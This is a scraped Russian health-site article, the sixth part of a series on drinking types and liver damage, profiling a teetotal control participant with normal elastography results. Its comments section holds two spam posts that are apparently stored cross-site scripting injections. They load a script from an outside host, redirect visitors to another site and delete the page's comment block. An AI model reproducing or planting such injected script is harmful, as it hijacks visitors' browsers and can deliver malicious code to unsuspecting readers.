Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Чья печень в опасности: а...  >>  Чья печень в опасности: алкотипы. Часть 6
 
Обратная связь
 

Чья печень в опасности: алкотипы. Часть 6

Размер шрифта
12 декабря 2013 00:00
  • google_analytics: false
  • Нравится

Если я напиваюсь и падаю с ног –
Это богу служение, а не порок.
Не могу же нарушить я замысел божий,
Если пьяницей быть предназначил мне бог!

Чья печень в опасности: алкотипы. Часть 6

Признавая величие и гениальность Омара Хайяма, мы, тем не менее, никак не можем согласититься с его гедонистическим взглядом на употребление алкоголя.

Ведь плата за мимолетное наслаждение очень высока: в конечном итоге оно будет стоит человеку жизни.

Алкоголь, подобно чуме, проносится по нашему организму, оставляя после себя лишь пепелище. Сердце, мозг, пищеварительный тракт и, конечно, печень – нет ни одного органа и ни одной функции, которые бы не страдали от чрезмерных возлияний.

Сегодня мы завершаем наш рассказ о результатах исследования, в котором принимали участие самые обычные люди: разного пола, возраста, социального положения и с одной лишь объединяющей характеристикой – тягой к спиртному, проявляющейся у каждого из них по-разному.

Ученые пытались выяснить, как индивидуальные особенности пристрастия к алкоголю влияют на здоровье печени. Напомним, что в качестве рабочего метода использовалась эластография, которая позволяет выявить степень фиброза (рубцевания) печеночной ткани. Результат в диапазоне от 7 до 14 кПа свидетельствует о повреждении печени, а более 14 кПа – о циррозе.

Напоследок мы решили представить вам результаты участницы, которая не употребляет алкоголь. Она выступила в качестве контрольного испытуемого. Почувствуйте, что называется, разницу!

Алкотип 6: трезвенник

Алла Григорович, 57 лет, секретарь, мать четырех детей. Живет в Тюмени, рост 163 см, вес 54 кг (ИМТ 20)

Употребление алкоголя: 0 единиц (1 единица = 10 мл)

Результат эластографии – 3,8 кПа (норма)

Комментарий пациента: «Никогда не любила алкогольные напитки: у меня от одного бокала вина голова начинает раскалываться, поэтому я решила, что проще отказаться от спиртного совсем. К еде я тоже довольно-таки равнодушна.

Спортом я особо не занимаюсь, но с другой стороны, я все время в движении.

В данный момент я чувствую себя абсолютно здоровой, но годы идут, и поневоле закрадываются тревожные мысли: «А вдруг там что-то не так, в организме?» Именно поэтому я с готовностью согласилась стать участницей этого исследования. И я очень рада, что, будучи старше всех в группе, я, тем не менее, продемонстрировала самый здоровый результат».

Комментарий эксперта: «Алла оказалась идеальным испытуемым. Конечно, возраст является фактором риска развития болезней печени, но здоровый образ жизни позволяет снизить его [риск] до минимума».

Итак, надеемся, что нам удалось донести до вас простую мысль: не стоит злоупотреблять алкоголем! Помните: сегодня вы радостно опрокидываете рюмку за рюмкой, а завтра становитесь счастливым обладателем цирроза!

Хотите узнать больше о здоровье печени и о том, как его сохранить? Милости просим в наш специальный проект «Заботься о печени»!

Узнайте все про другие алкотипы здесь:

Алкотип 1: алкоголь от случая к случаю,

Алкотип 2: ни дня без алкоголя,

Алкотип 3: алкоголь в прошлом,

Алкотип 4: алкоголь по выходным,

Алкотип 5: любитель домашнего вина.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:50

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:50

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Для кого алкоголь опасней всего   Чья печень в опасности: алкотипы. Часть 2   Кофе спасает от рака печени   Чья печень в опасности: алкотипы. Часть 4  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Что алкоголь делает с печенью
Гепатит? Можно ли вылечиться?
Как понять, что вы пьете много?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.